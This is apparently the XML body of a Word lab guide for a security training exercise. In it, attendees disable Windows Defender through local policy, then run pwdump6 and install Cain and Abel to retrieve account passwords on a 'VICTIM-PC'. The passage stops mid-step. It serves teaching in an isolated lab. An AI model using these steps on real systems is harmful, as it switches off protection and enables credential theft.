    <w:p w14:paraId="56EC4A2D" w14:textId="2569459E" w:rsidR="004B3805" w:rsidRDefault="004B3805" w:rsidP="004B3805">
      <w:pPr>
        <w:pStyle w:val="Titre4"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc44075681"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Task 3: Run hack tools</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="54BE403D" w14:textId="3EFFA312" w:rsidR="004B3805" w:rsidRDefault="006C4FF0" w:rsidP="004B3805">
      <w:r w:rsidRPr="006C4FF0">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>In this part attendees will use different t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>ools to retrieve account passwords</w:t>
      </w:r>
      <w:r w:rsidRPr="006C4FF0">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E56CD03" w14:textId="6B763A8D" w:rsidR="00D80ABA" w:rsidRDefault="00D80ABA" w:rsidP="000C6667">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00D30D6B">
        <w:t xml:space="preserve">tart VICTIM-PC. Ensure first VICTIM-DC and VICTIM-SRV </w:t>
      </w:r>
      <w:r w:rsidR="00626310">
        <w:t>are</w:t>
      </w:r>
      <w:r w:rsidR="00D30D6B">
        <w:t xml:space="preserve"> started</w:t>
      </w:r>
      <w:r w:rsidR="00E83F2A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A557F9" w14:textId="4CF9DD6E" w:rsidR="00D85258" w:rsidRDefault="00D85258" w:rsidP="000C6667">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Logon using your local administrator account</w:t>
      </w:r>
      <w:r w:rsidR="0059303C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FDCA78" w14:textId="152F3E9F" w:rsidR="0059303C" w:rsidRDefault="0059303C" w:rsidP="000C6667">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Bind tools on VICTIM-PC machine</w:t>
      </w:r>
      <w:r w:rsidR="003E28E8">
        <w:t xml:space="preserve"> from console</w:t>
      </w:r>
      <w:r w:rsidR="00F67A7D">
        <w:t xml:space="preserve"> using </w:t>
      </w:r>
      <w:r w:rsidR="00F67A7D" w:rsidRPr="00C6425D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Lab_Tools_v2.iso</w:t>
      </w:r>
      <w:r w:rsidR="00F67A7D">
        <w:t xml:space="preserve"> on Hyper-V server in </w:t>
      </w:r>
      <w:r w:rsidR="00F67A7D" w:rsidRPr="00C6425D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>C:\_TOOLS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F334E7" w14:textId="3C9A49FE" w:rsidR="0059303C" w:rsidRDefault="0059303C" w:rsidP="0059303C">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5261B17D" wp14:editId="41FCE124">
            <wp:extent cx="6858000" cy="2279796"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="15" name="Picture 15" descr="Machine generated alternative text:&#10;VICTIM-PC on ECE-TD5-HYPERV - Virtual Machine Connection &#10;File Action Media Clipboard View Help &#10;Open &#10;Organize • &#10;ThisPC &#10;New folder &#10;Local Disk &#10;TOOLS &#10;* Quick access &#10;Desktop &#10;Downloads &#10;Documents &#10;[e Pictures &#10;Name &#10;8gInfo &#10;en wind &#10;10 &#10;Lab Tools v2 &#10;business &#10;editions versio... &#10;Date modified &#10;6/21/2018 5:32 AM &#10;6/20/2018 2:30 PM &#10;6/20/2018612 PM &#10;Type &#10;File folder &#10;Disc Image File &#10;Disc Image File &#10;Size &#10;4,487, 186 KB &#10;73610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VICTIM-PC on ECE-TD5-HYPERV - Virtual Machine Connection &#10;File Action Media Clipboard View Help &#10;Open &#10;Organize • &#10;ThisPC &#10;New folder &#10;Local Disk &#10;TOOLS &#10;* Quick access &#10;Desktop &#10;Downloads &#10;Documents &#10;[e Pictures &#10;Name &#10;8gInfo &#10;en wind &#10;10 &#10;Lab Tools v2 &#10;business &#10;editions versio... &#10;Date modified &#10;6/21/2018 5:32 AM &#10;6/20/2018 2:30 PM &#10;6/20/2018612 PM &#10;Type &#10;File folder &#10;Disc Image File &#10;Disc Image File &#10;Size &#10;4,487, 186 KB &#10;73610 KB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279796"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE6B776" w14:textId="1B16B212" w:rsidR="00416A9B" w:rsidRDefault="00416A9B" w:rsidP="00A01861"/>
    <w:p w14:paraId="06D01C18" w14:textId="4A32BC06" w:rsidR="00F14E6C" w:rsidRPr="001E05B0" w:rsidRDefault="00F14E6C" w:rsidP="000C6667">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Segoe UI" w:cstheme="minorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E05B0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Segoe UI" w:cstheme="minorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Hacking tools are not working </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001E05B0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Segoe UI" w:cstheme="minorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>as long as</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001E05B0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Segoe UI" w:cstheme="minorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows Defender active:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D2769E" w14:textId="0E01881A" w:rsidR="00F14E6C" w:rsidRDefault="00F14E6C" w:rsidP="00F14E6C">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C757FF3" wp14:editId="1AD1BE09">
            <wp:extent cx="4572000" cy="3620293"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17" name="Picture 17" descr="Machine generated alternative text:&#10;Settings &#10;Gö Home &#10;Find a setting &#10;Update &amp; Security &#10;Windows Update &#10;Windows Security &#10;Backup &#10;Troubleshoot &#10;Recovery &#10;Activation &#10;Find my device &#10;For developers &#10;Windows Insider Program &#10;Windows Security &#10;Windows Defender Security Center is your home to view and &#10;manage the security and health of your device. &#10;Open Windows Defender Security Center &#10;Protection areas &#10;-o &#10;Virus &amp; threat protection &#10;Protection for your device against threats. &#10;Account protection &#10;Security far your account and sign-in. &#10;Firewall &amp; network protection &#10;Who and what can access your netvuork. &#10;App &amp; browser control &#10;App protection and online security. &#10;Device security &#10;Security that comes built into your device. &#10;Device performance &amp; health &#10;Reports an the health of your device. &#10;Familv ontin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Settings &#10;Gö Home &#10;Find a setting &#10;Update &amp; Security &#10;Windows Update &#10;Windows Security &#10;Backup &#10;Troubleshoot &#10;Recovery &#10;Activation &#10;Find my device &#10;For developers &#10;Windows Insider Program &#10;Windows Security &#10;Windows Defender Security Center is your home to view and &#10;manage the security and health of your device. &#10;Open Windows Defender Security Center &#10;Protection areas &#10;-o &#10;Virus &amp; threat protection &#10;Protection for your device against threats. &#10;Account protection &#10;Security far your account and sign-in. &#10;Firewall &amp; network protection &#10;Who and what can access your netvuork. &#10;App &amp; browser control &#10;App protection and online security. &#10;Device security &#10;Security that comes built into your device. &#10;Device performance &amp; health &#10;Reports an the health of your device. &#10;Familv ontinn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124" cy="3626726"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCF0ACF" w14:textId="656DCDBF" w:rsidR="00416A9B" w:rsidRDefault="00416A9B" w:rsidP="00F14E6C">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="407B06D5" w14:textId="0C6D9DFC" w:rsidR="00A01861" w:rsidRDefault="00A01861" w:rsidP="00F14E6C">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="645291EE" w14:textId="389183A5" w:rsidR="00A01861" w:rsidRDefault="00A01861" w:rsidP="00F14E6C">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41741DBE" w14:textId="77777777" w:rsidR="00A01861" w:rsidRDefault="00A01861" w:rsidP="00F14E6C">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31592681" w14:textId="23CA2734" w:rsidR="00F14E6C" w:rsidRDefault="00F14E6C" w:rsidP="008A5CFA">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To disable Windows Defender, you can use local policy and reboot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4426F030" w14:textId="6FEE9C1A" w:rsidR="00F14E6C" w:rsidRDefault="00F14E6C" w:rsidP="00F14E6C">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42BA7966" wp14:editId="0D31195D">
            <wp:extent cx="5803900" cy="3613292"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
            <wp:docPr id="16" name="Picture 16" descr="Machine generated alternative text:&#10;RSS Feeds &#10;Search &#10;Security Center &#10;Shutdown Options &#10;Smart Card &#10;Software Protection Platform &#10;Sound Recorder &#10;Speech &#10;Store &#10;Sync your settings &#10;Tablet pc &#10;Task Scheduler &#10;Text Input &#10;Windows Calendar &#10;Windows Color System &#10;Impro &#10;Windows Defender Antivirus &#10;Windows Defender Application Guarc &#10;Windows Defender Exploit Guard &#10;Windows Defender Security Center &#10;Windows Defender SmartScreen &#10;Windows Defender Antivirus &#10;Turn off Windows Defender &#10;Edit &#10;Requirements: &#10;At least Windows Vista &#10;Description: &#10;This policy setting turns off Windows &#10;Defender Antivirus. &#10;If you enable this policy setting, &#10;Windows Defender Antivirus does not &#10;run, and computers are not scanned &#10;for malware or other potentially &#10;unwanted software. &#10;o not configure &#10;this policy setting, by &#10;Windows Defender Antivirus runs and &#10;computers are scanned for malware &#10;and other potentially unwante &#10;Setting &#10;Client Interface &#10;Exclusions &#10;MpEngine &#10;Network Inspection System &#10;Quarantine &#10;Real-time Protection &#10;Remediation &#10;Reporting &#10;Signature Updates &#10;Threats &#10;Windows Defender Exploit Guard &#10;Allow antimalware service to startu with normal priority &#10;Turn off Windows Defender Antivirus &#10;havior for lists &#10;Turn off routine remediation &#10;Define addresses to bypass pray server &#10;to the network &#10;Turn off Windows Defender Antivirus &#10;Turn off Windows Defender Antivirus &#10;Previous Setting &#10;Next Setting &#10;always &#10;State &#10;Not configured &#10;Not configured &#10;Not configured &#10;Not configured &#10;Not configured &#10;Not configured &#10;Not configured &#10;Not configured &#10;Not configured &#10;C) Not Configured &#10;@ Enabled &#10;C) Disabled &#10;Supported on: &#10;At least Windows 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RSS Feeds &#10;Search &#10;Security Center &#10;Shutdown Options &#10;Smart Card &#10;Software Protection Platform &#10;Sound Recorder &#10;Speech &#10;Store &#10;Sync your settings &#10;Tablet pc &#10;Task Scheduler &#10;Text Input &#10;Windows Calendar &#10;Windows Color System &#10;Impro &#10;Windows Defender Antivirus &#10;Windows Defender Application Guarc &#10;Windows Defender Exploit Guard &#10;Windows Defender Security Center &#10;Windows Defender SmartScreen &#10;Windows Defender Antivirus &#10;Turn off Windows Defender &#10;Edit &#10;Requirements: &#10;At least Windows Vista &#10;Description: &#10;This policy setting turns off Windows &#10;Defender Antivirus. &#10;If you enable this policy setting, &#10;Windows Defender Antivirus does not &#10;run, and computers are not scanned &#10;for malware or other potentially &#10;unwanted software. &#10;o not configure &#10;this policy setting, by &#10;Windows Defender Antivirus runs and &#10;computers are scanned for malware &#10;and other potentially unwante &#10;Setting &#10;Client Interface &#10;Exclusions &#10;MpEngine &#10;Network Inspection System &#10;Quarantine &#10;Real-time Protection &#10;Remediation &#10;Reporting &#10;Signature Updates &#10;Threats &#10;Windows Defender Exploit Guard &#10;Allow antimalware service to startu with normal priority &#10;Turn off Windows Defender Antivirus &#10;havior for lists &#10;Turn off routine remediation &#10;Define addresses to bypass pray server &#10;to the network &#10;Turn off Windows Defender Antivirus &#10;Turn off Windows Defender Antivirus &#10;Previous Setting &#10;Next Setting &#10;always &#10;State &#10;Not configured &#10;Not configured &#10;Not configured &#10;Not configured &#10;Not configured &#10;Not configured &#10;Not configured &#10;Not configured &#10;Not configured &#10;C) Not Configured &#10;@ Enabled &#10;C) Disabled &#10;Supported on: &#10;At least Windows Vist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992" cy="3617707"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D94CA9" w14:textId="50822510" w:rsidR="00F14E6C" w:rsidRDefault="00626310" w:rsidP="008A5CFA">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Machine reboot</w:t>
      </w:r>
      <w:r w:rsidR="004216C8">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> recommended.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD4C5B5" w14:textId="438EE4E2" w:rsidR="00F67A7D" w:rsidRDefault="00F67A7D" w:rsidP="008A5CFA">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You should see in the Windows Defender Security Center this ico</w:t>
      </w:r>
      <w:r w:rsidR="00AE4D89">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2656EF84" w14:textId="5BEF99CD" w:rsidR="00F45770" w:rsidRDefault="00F67A7D" w:rsidP="00C6425D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F67A7D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="730D3BF2" wp14:editId="11557D2E">
            <wp:extent cx="1193121" cy="1575091"/>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1135" cy="1598872"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD869BE" w14:textId="77777777" w:rsidR="00416A9B" w:rsidRDefault="00416A9B" w:rsidP="00416A9B"/>
    <w:p w14:paraId="6D1DD297" w14:textId="7E16A57C" w:rsidR="00F14E6C" w:rsidRDefault="003B0E44" w:rsidP="000C6667">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Copy tools from media on local folder (e.g. C:\Hack</w:t>
      </w:r>
      <w:r w:rsidR="00D50B66">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68ADA04F" w14:textId="77777777" w:rsidR="00D50B66" w:rsidRDefault="00D330B4" w:rsidP="00D330B4">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E3FE1F0" wp14:editId="5C9F4487">
            <wp:extent cx="4032250" cy="3858310"/>
            <wp:effectExtent l="0" t="0" r="6350" b="8890"/>
            <wp:docPr id="19" name="Picture 19" descr="Machine generated alternative text:&#10;: \&gt;robocopy d: \pwdump6-2 .ø.ø c: \Hack\pwdump &#10;ROBOCOPY &#10;St art ed &#10;Source &#10;Dest &#10;Files &#10;Options . &#10;188% &#10;188% &#10;188% &#10;188% &#10;188% &#10;188% &#10;188% &#10;188% &#10;Dirs . &#10;Files &#10;Bytes &#10;Times . &#10;Speed &#10;Speed &#10;Ended &#10;Robust File Copy for Windows &#10;Wednesday, June 28, 2818 pm &#10;c : \Hack\pwdump\ &#10;s.' /DCOPY:DA /COPY:DAT /R:1øøøøøø &#10;New Dir &#10;New &#10;New &#10;New &#10;New &#10;New &#10;New &#10;New &#10;New &#10;New &#10;File &#10;File &#10;File &#10;File &#10;File &#10;File &#10;File &#10;File &#10;File &#10;'W: 38 &#10;Isremora . dll &#10;Isremora . lib &#10;Isremora64. dll &#10;Isremora64. lib &#10;PwDump. exe &#10;servpw. exe &#10;servpw. lib &#10;servpw64. exe &#10;servpw64. lib &#10;Total &#10;633.6 k &#10;Wednesday, &#10;Copied &#10;633.6 k &#10;3758832 &#10;214. 624 &#10;June 28, &#10;65536 &#10;1982 &#10;68688 &#10;1928 &#10;393216 &#10;53768 &#10;1748 &#10;68416 &#10;1788 &#10;Skipped &#10;Bytes/ sec . &#10;mismatch &#10;FAILED &#10;Extras &#10;megaBytes/min . &#10;2818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 \&gt;robocopy d: \pwdump6-2 .ø.ø c: \Hack\pwdump &#10;ROBOCOPY &#10;St art ed &#10;Source &#10;Dest &#10;Files &#10;Options . &#10;188% &#10;188% &#10;188% &#10;188% &#10;188% &#10;188% &#10;188% &#10;188% &#10;Dirs . &#10;Files &#10;Bytes &#10;Times . &#10;Speed &#10;Speed &#10;Ended &#10;Robust File Copy for Windows &#10;Wednesday, June 28, 2818 pm &#10;c : \Hack\pwdump\ &#10;s.' /DCOPY:DA /COPY:DAT /R:1øøøøøø &#10;New Dir &#10;New &#10;New &#10;New &#10;New &#10;New &#10;New &#10;New &#10;New &#10;New &#10;File &#10;File &#10;File &#10;File &#10;File &#10;File &#10;File &#10;File &#10;File &#10;'W: 38 &#10;Isremora . dll &#10;Isremora . lib &#10;Isremora64. dll &#10;Isremora64. lib &#10;PwDump. exe &#10;servpw. exe &#10;servpw. lib &#10;servpw64. exe &#10;servpw64. lib &#10;Total &#10;633.6 k &#10;Wednesday, &#10;Copied &#10;633.6 k &#10;3758832 &#10;214. 624 &#10;June 28, &#10;65536 &#10;1982 &#10;68688 &#10;1928 &#10;393216 &#10;53768 &#10;1748 &#10;68416 &#10;1788 &#10;Skipped &#10;Bytes/ sec . &#10;mismatch &#10;FAILED &#10;Extras &#10;megaBytes/min . &#10;2818 pm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682" cy="3860637"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1F0AA1" w14:textId="77777777" w:rsidR="00D50B66" w:rsidRDefault="00D50B66" w:rsidP="00D330B4"/>
    <w:p w14:paraId="17DC51C1" w14:textId="1EC4AF4D" w:rsidR="008A26E4" w:rsidRDefault="008A26E4" w:rsidP="000C6667">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">From elevated CMD, run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PwDump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> tool:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C919045" w14:textId="4BAE2251" w:rsidR="00F14E6C" w:rsidRDefault="00D330B4" w:rsidP="008A26E4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63CB754C" wp14:editId="4C3279D5">
            <wp:extent cx="4391025" cy="1919624"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="18" name="Picture 18" descr="Machine generated alternative text:&#10;: \Hack\pwdump&gt;PwDump. exe &#10;pwdump6 Version 2.8.ø-beta-2 by fizzgig and the &#10;THIS IS A BETA VERSION! &#10;YOU HAVE BEEN WARNED. &#10;opyright 2889 foofus . net &#10;This program is free software under the GNU &#10;eneral Public License Version 2 (GNU GPL), you &#10;localhost &#10;mighty group at foofus . net &#10;can redistribute it and/or &#10;dify it under the terms of the GNU GPL, as published by the Free Software &#10;Foundation. NO WARRANTY, EXPRESSED OR IMPLIED, IS GRANTED WITH THIS &#10;PROGRAM. Please see the COPYING file included with this program &#10;and the GNU GPL for further details. &#10;history available &#10;plet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 \Hack\pwdump&gt;PwDump. exe &#10;pwdump6 Version 2.8.ø-beta-2 by fizzgig and the &#10;THIS IS A BETA VERSION! &#10;YOU HAVE BEEN WARNED. &#10;opyright 2889 foofus . net &#10;This program is free software under the GNU &#10;eneral Public License Version 2 (GNU GPL), you &#10;localhost &#10;mighty group at foofus . net &#10;can redistribute it and/or &#10;dify it under the terms of the GNU GPL, as published by the Free Software &#10;Foundation. NO WARRANTY, EXPRESSED OR IMPLIED, IS GRANTED WITH THIS &#10;PROGRAM. Please see the COPYING file included with this program &#10;and the GNU GPL for further details. &#10;history available &#10;pleted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9452" cy="1923308"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="364B715F" w14:textId="750A14A4" w:rsidR="00A01861" w:rsidRDefault="00A01861"/>
    <w:p w14:paraId="2EC42C78" w14:textId="31C7CA4E" w:rsidR="008700A1" w:rsidRDefault="008700A1" w:rsidP="000C6667">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Install on machine the application </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>D:\Cain_and_Abel.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008CD314" w14:textId="0599D8D0" w:rsidR="008700A1" w:rsidRDefault="00F26168" w:rsidP="00FF18FF">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Start application with elevated privileges :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FD8424" w14:textId="7A1F5F5A" w:rsidR="008700A1" w:rsidRDefault="00AE4D89" w:rsidP="008A26E4">
      <w:r w:rsidRPr="00AE4D89">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FB0445D" wp14:editId="79F9EBCE">
            <wp:extent cx="3936321" cy="2587044"/>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6398" cy="2593667"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="621E871E" w14:textId="2B5E9467" w:rsidR="008700A1" w:rsidRDefault="008700A1" w:rsidP="00FF18FF">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Then right click on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>hiddenadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
